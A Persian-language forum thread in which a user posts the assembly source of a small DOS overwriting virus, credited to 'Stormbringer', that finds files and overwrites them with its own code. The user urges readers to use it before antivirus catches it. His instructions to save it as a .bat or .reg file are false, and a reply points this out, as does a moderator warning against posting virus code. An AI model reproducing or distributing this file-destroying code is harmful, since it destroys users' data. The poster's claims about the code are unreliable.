ايران ويج

نسخه‌ی کامل: ویروس اسمبلی
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
سلام دوستان توی اولین پست میخوام سورس یه ویروس قوی که با زبان اسمبلی ساخته شده رو بزارم شاید بدونید که قویترین ویروسها به زبان اسمبلی نوشته شده .دوستان اگه میخواید از این ویروس استفاده کنید هر چه زودتر دست به کارشید چون این یه ویروس جدیده و هنوز کسپراسکای 2009 هم پیداش نکرده مطمئن باشی هیچ جای دیگه این سورسو نمیتونید پیدا کنید با تشکر:meysam s
www.meysamqt.blogfa.com
اینم سورس:برای استفاده نت پد رو باز کنید این کد ها رو توش کپی پیست کنید و با فرمت batیا rej سیو کنید.یک بار هم روی کامپیوتر خود امتحان نکنید چون فاتحه ی رجیستری خوندس.
.
;Code by Stormbringer..
.model tiny
.radix 16
.code
org 100
start:

FindFile:
xchg cx,ax ;ax defaults to zero on runtime - cx doesn't
push si ;si defaults to 100h under dos - use this l8r
mov dx,offset filemask
mov ah,4e
int 21
OverwriteFile:
mov dx,9e
mov ah,3c
int 21
WriteVirus:
xchg bx,ax
mov ah,40
pop dx ;get 100h from si earlier for write pointer
mov cl,endvir-start ;move only to CL, CH is already zero
int 21
Terminate:
ret ;terminate by returning to PSP (Int 20)
filemask db '*.*',0
endvir:
end start
مطمئنی باید با پسوند bat یا reg ذخیره بشه؟و احتیاج به کامپایلر asemble نداره؟
چه چیزا :

1- اگه کد اسمبلیه که باید فایلش با پسوند asm ذخیره بعد از کامپایل می شه Obj بعدم لینکر می کندش exe

2- شما از وقفه ها استفاده کردید،اجرای این برنامه روی ویندوز به صورت خالی غیرممکنه

3- آنتی ویروس پیداش نمی کنه چون هیچی نیست ،یه سری دستور بی ربط توی یه فایل bat یا reg

4- اگه کاربرایی که اینجا رو می بینن روی کامپیوترشون تست کنن می فهمن که این چیه برای همین گفتید که فاتحه رجیستری خودنس

تازه ، اگه این ویروس فقط رجیستری رو می ترکونه که شبه ویروسکه(شاید) ، اونم با یه Repair بر می گرده
دوستان ويروس نويس عزيز توجه بفرمائيد

با توجه به بالا رفتن تب ويروس نويسي بين اكثريت كساني كه دوره ويندوز XP رو تازه تموم كردن من مجبورم پست هاي

اين عزيزان رو بلافاصله از فروم حذف كنن. لطفا هرجا چند خط كد ديد كه گفتن ويروسه اينجا پيستش نكنيد.

با تشكر
(۱۵-اسفند-۱۳۸۷, ۱۷:۳۶:۳۰)Di Di نوشته است: [ -> ]دوستان ويروس نويس عزيز توجه بفرمائيد

با توجه به بالا رفتن تب ويروس نويسي بين اكثريت كساني كه دوره ويندوز XP رو تازه تموم كردن من مجبورم پست هاي

اين عزيزان رو بلافاصله از فروم حذف كنن. لطفا هرجا چند خط كد ديد كه گفتن ويروسه اينجا پيستش نكنيد.

با تشكر
تایید میشه